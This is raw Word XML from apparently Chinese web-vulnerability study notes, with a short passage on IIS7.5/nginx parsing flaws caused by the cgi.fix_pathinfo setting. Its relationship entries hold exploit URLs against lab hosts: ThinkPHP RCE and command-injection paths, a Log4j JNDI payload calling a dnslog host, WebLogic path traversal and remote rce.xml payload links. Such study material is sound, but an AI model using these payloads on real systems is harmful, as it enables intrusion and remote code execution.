          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（没怎么了解）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FECCC69" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>IIS7.5漏洞与nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>类似，均由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.ini配置文件开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>cgi.fix_pathinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>，而这并不是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6ADC65" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>iis7.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>本身的漏洞，都是配置不当引起的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095D919" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00615185">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="680" w:right="850" w:bottom="680" w:left="85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086EC49"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B086EC49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D1BAE4C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0D1BAE4C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="728455617">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="634068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ZmOGUxMmFjZmVkZTY5ODM4NWFhYWI0NTk2ZmFjYzAifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00615185"/>
    <w:rsid w:val="00615185"/>
    <w:rsid w:val="00717A0E"/>
    <w:rsid w:val="00B05B36"/>
    <w:rsid w:val="00B869A9"/>
    <w:rsid w:val="00BD2582"/>
    <w:rsid w:val="053A0DD9"/>
    <w:rsid w:val="0AEB660B"/>
    <w:rsid w:val="0B633415"/>
    <w:rsid w:val="0CF53DD2"/>
    <w:rsid w:val="100F3F86"/>
    <w:rsid w:val="106612B1"/>
    <w:rsid w:val="10D601E5"/>
    <w:rsid w:val="10EC5C5A"/>
    <w:rsid w:val="11D24111"/>
    <w:rsid w:val="13777B70"/>
    <w:rsid w:val="143D31C4"/>
    <w:rsid w:val="15B17473"/>
    <w:rsid w:val="17D552AB"/>
    <w:rsid w:val="1ABF3EE2"/>
    <w:rsid w:val="1AC271D0"/>
    <w:rsid w:val="1AFA6AA4"/>
    <w:rsid w:val="1BD042CC"/>
    <w:rsid w:val="1E3B3D7D"/>
    <w:rsid w:val="1E6E64EA"/>
    <w:rsid w:val="1FC83753"/>
    <w:rsid w:val="28EF40E2"/>
    <w:rsid w:val="2AE04E87"/>
    <w:rsid w:val="2B0F6376"/>
    <w:rsid w:val="2DB63420"/>
    <w:rsid w:val="2E976DAE"/>
    <w:rsid w:val="2F2D48AF"/>
    <w:rsid w:val="309061AB"/>
    <w:rsid w:val="340F2BDB"/>
    <w:rsid w:val="34A57D4B"/>
    <w:rsid w:val="351F5D4F"/>
    <w:rsid w:val="38264D01"/>
    <w:rsid w:val="3F632CDC"/>
    <w:rsid w:val="410D32DD"/>
    <w:rsid w:val="42960423"/>
    <w:rsid w:val="44E2239F"/>
    <w:rsid w:val="47256037"/>
    <w:rsid w:val="47FA0B87"/>
    <w:rsid w:val="49757894"/>
    <w:rsid w:val="4A301A86"/>
    <w:rsid w:val="4BE86A43"/>
    <w:rsid w:val="4D0C050F"/>
    <w:rsid w:val="4E1E1CCD"/>
    <w:rsid w:val="4EC866B8"/>
    <w:rsid w:val="4FB30389"/>
    <w:rsid w:val="51C41D11"/>
    <w:rsid w:val="51CC64BF"/>
    <w:rsid w:val="52341943"/>
    <w:rsid w:val="54E70668"/>
    <w:rsid w:val="559E0172"/>
    <w:rsid w:val="56796828"/>
    <w:rsid w:val="57923D07"/>
    <w:rsid w:val="59C53F20"/>
    <w:rsid w:val="5F38753A"/>
    <w:rsid w:val="611F660B"/>
    <w:rsid w:val="628610BD"/>
    <w:rsid w:val="67362901"/>
    <w:rsid w:val="67544E97"/>
    <w:rsid w:val="6BBF4D23"/>
    <w:rsid w:val="6D0D473D"/>
    <w:rsid w:val="6FD54120"/>
    <w:rsid w:val="71121CE9"/>
    <w:rsid w:val="716A111C"/>
    <w:rsid w:val="71F13917"/>
    <w:rsid w:val="72094370"/>
    <w:rsid w:val="746E5488"/>
    <w:rsid w:val="748702F8"/>
    <w:rsid w:val="79A65D53"/>
    <w:rsid w:val="79E0748E"/>
    <w:rsid w:val="7A5C753F"/>
    <w:rsid w:val="7D76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FC526D"/>
  <w15:docId w15:val="{400EFD65-5F88-48C4-963B-A4DAAFA4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uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New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4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19.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://your-ip:8080/index.php?s=/Index/think/app/invokefunction&amp;function=" TargetMode="Externa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8.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.11/rce.xml" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89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hyperlink" Target="http://localhost:8080/xxxx/.." TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43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5.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://so.csdn.net/so/search?q=%E9%80%9A%E4%BF%A1%E5%8D%8F%E8%AE%AE&amp;spm=1001.2101.3001.7020" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120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29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1.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vulhub.org/#/environments/weblogic/CVE-2017-10271/" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49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hyperlink" Target="https://vulhub.org/#/environments/httpd/apache_parsing_vulnerability/" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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4.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.9:8080/index.php?a=id" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39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13.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130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2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0.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.9:7001/bea_wls_internal/test.jsp" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png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3.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.9:8081/files../" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118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hyperlink" Target="http://127.0.0.1:9001/hello?payload=$%7bjndi:ldap:/7fprj5.dnslog.cn%7d" TargetMode="External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hyperlink" Target="http://192.168.1.9:7001/console/css/%252e%252e%252fconsole.portal" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126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hyperlink" Target="http://192.168.1.9:8080/index.php?a=whoami" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122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1.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.7/pikachu/php.jpg/aaa.php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hyperlink" Target="http://192.168.1.9:8080/?lang=../../../../../public/index" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xm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hyperlink" Target="http://example.com/rce.xml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1.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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2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4.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115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hyperlink" Target="http://192.168.1.9:7001/console/css/%252e%252e%252fconsole.portal" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013" TargetMode="External"/><Relationship Id="rId90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57</Pages>
  <Words>5918</Words>
  <Characters>33737</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>281</Lines>
  <Paragraphs>79</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>39576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Office</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-21T22:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-21T11:56:00Z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2A9324948FF749FC8547B7E119ACEC21_13</vt:lpwstr>
  </property>
</Properties>
</file>